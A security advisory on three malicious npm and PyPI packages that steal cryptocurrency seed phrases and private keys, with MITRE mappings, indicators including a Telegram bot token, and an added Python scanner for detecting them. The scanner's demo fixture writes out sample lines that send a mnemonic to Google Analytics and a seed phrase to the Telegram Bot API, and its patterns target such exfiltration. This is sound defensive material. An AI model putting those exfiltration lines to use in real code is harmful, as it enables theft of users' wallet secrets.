The Bad Seeds: Malicious npm and PyPI Packages Pose as Developer Tools to Steal Wallet Credentials

The Socket Threat Research Team has identified three malicious packages, published on npm and PyPI, that steal cryptocurrency secrets such as mnemonic seed phrases and private keys. The packages pose as legitimate developer tools while quietly collecting sensitive data and sending it to the attackers over Google Analytics and Telegram bots. Developers are warned never to hand their secrets to software and to be wary of socially engineered prompts that ask for them. Affected: npm, PyPI, cryptocurrency sector

Key Points:

  • Three malicious packages targeting cryptocurrency users were found on npm and PyPI.
  • react-native-scrollpageviewtest extracts mnemonic seed phrases and private keys and exfiltrates them through Google Analytics.
  • web3x harvests mnemonic seed phrases and wallet balances and sends them to a Telegram bot.
  • herewalletbot automates interactions with users on Telegram to collect their wallet seed phrases.
  • All three packages were still available at the time of reporting, despite takedown requests to the registries.
  • Developers are advised never to share a mnemonic seed phrase with any software.
  • The packages abuse the trust developers place in the open-source ecosystem.
  • Socket's security tools provide real-time analysis and malware detection for open-source dependencies.

MITRE ATT&CK Techniques:

  • T1195.002 – Supply Chain Compromise: Compromise Software Supply Chain
  • T1059.006 – Command and Scripting Interpreter: Python
  • T1059.007 – Command and Scripting Interpreter: JavaScript
  • T1566.003 – Phishing: Spearphishing via Service
  • T1608.001 – Stage Capabilities: Upload Malware
  • T1204.002 – User Execution: Malicious File
  • T1552.004 – Unsecured Credentials: Private Keys
  • T1071.001 – Application Layer Protocol: Web Protocols
  • T1041 – Exfiltration Over C2 Channel (stolen secrets smuggled out in Google Analytics requests)

Indicators of Compromise:

  • [Malicious Package] react-native-scrollpageviewtest
  • [Malicious Package] web3x
  • [Malicious Package] herewalletbot
  • [Telegram Bot] @herewalletbot
  • [Telegram Bot Token] 5847347125:AAG-WskaS485OUlGLfa5AKEMW1aKYymplPQ
  • [Email] [email protected]
  • [Email] [email protected]
  • [Email] [email protected]
  • [Defunct Repo] https://github.com/vannszs/HotWalletBot/
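
The key points above name two exfiltration channels (Google Analytics collect requests and the Telegram Bot API), and the IOC list gives the three package names. The script below is an added example, not Socket's tooling or code from the report: it walks a dependency tree such as node_modules or site-packages, flags the three IOC package names, and greps each package's source for those two channels plus any reference to wallet secrets. The regular expressions, the risk rule (a known name, or an exfiltration channel combined with wallet-secret access) and the sample package tree are this example's own assumptions; the sample files and the placeholder bot token are constructed, not real package contents.

```python
"""Triage scanner for wallet-stealing packages in a dependency tree (added example)."""
import re
import tempfile
from pathlib import Path

# Package names from the IOC list in the report.
MALICIOUS_NAMES = {"react-native-scrollpageviewtest", "web3x", "herewalletbot"}

# Exfiltration channels named in the report. These patterns are this example's
# assumptions about what such code looks like, not signatures from Socket.
PATTERNS = {
    "telegram-bot-api": re.compile(r"api\.telegram\.org/bot"),
    # Telegram bot token shape: numeric bot id, colon, 35-character secret.
    "telegram-bot-token": re.compile(
        r"(?<![0-9])[0-9]{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])"),
    # Google Analytics / Measurement Protocol collect endpoints.
    "google-analytics-collect": re.compile(
        r"google-analytics\.com/(?:mp/|debug/mp/)?collect"),
    "wallet-secret-access": re.compile(r"mnemonic|seed ?phrase|private[_ ]?key", re.I),
}

SOURCE_EXT = {".js", ".mjs", ".cjs", ".ts", ".py"}


def package_name(root: Path, path: Path) -> str:
    """Top-level package a file belongs to; npm scoped packages use two path parts."""
    parts = path.relative_to(root).parts
    if parts[0].startswith("@") and len(parts) > 1:
        return "/".join(parts[:2])
    return parts[0]


def scan_file(path: Path) -> set:
    """Return the set of pattern tags that match anywhere in one source file."""
    text = path.read_text(encoding="utf-8", errors="replace")
    return {tag for tag, rx in PATTERNS.items() if rx.search(text)}


def scan_tree(root) -> dict:
    """Map each package under root to the set of tags its source files hit."""
    root = Path(root)
    results = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix not in SOURCE_EXT:
            continue
        name = package_name(root, path)
        results.setdefault(name, set())
        if name in MALICIOUS_NAMES:
            results[name].add("known-malicious-name")
        results[name] |= scan_file(path)
    return results


def is_suspicious(tags: set) -> bool:
    """Flag a known bad name, or any exfil channel combined with wallet-secret access.

    A package that only talks to Google Analytics (ordinary telemetry) is not flagged
    on its own; it must also touch mnemonics, seed phrases or private keys."""
    if "known-malicious-name" in tags:
        return True
    exfil = {"telegram-bot-api", "telegram-bot-token", "google-analytics-collect"}
    return bool(tags & exfil) and "wallet-secret-access" in tags


def build_sample_tree() -> Path:
    """Constructed node_modules tree for demonstration; not real package code."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    fake_token = "1234567890:" + "A" * 35   # placeholder with the bot-token shape
    files = {
        "react-native-scrollpageviewtest/index.js":
            "const m = wallet.mnemonic;\n"
            "fetch('https://www.google-analytics.com/collect?v=1&t=event&ea=' + m);\n",
        "web3x/lib/index.js":
            "const seedPhrase = getSeedPhrase();\n"
            f"fetch('https://api.telegram.org/bot{fake_token}/sendMessage?text=' + seedPhrase);\n",
        # Benign telemetry: GA endpoint but no wallet-secret access.
        "@acme/telemetry/index.js":
            "fetch('https://www.google-analytics.com/mp/collect', {method: 'POST'});\n",
        "left-pad/index.js":
            "module.exports = (s, n) => s.padStart(n);\n",
    }
    for rel, body in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
    return root


if __name__ == "__main__":
    for name, tags in sorted(scan_tree(build_sample_tree()).items()):
        verdict = "SUSPICIOUS" if is_suspicious(tags) else "ok"
        print(f"{verdict:10} {name}: {sorted(tags)}")
```

Run it against a real tree with `scan_tree("node_modules")` or `scan_tree(site.getsitepackages()[0])`; anything that hits "telegram-bot-token" deserves a manual look regardless of the verdict, since a hard-coded bot token in a dependency has no legitimate reason to be there.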

Full Story: https://socket.dev/blog/malicious-npm-and-pypi-packages-steal-wallet-credentials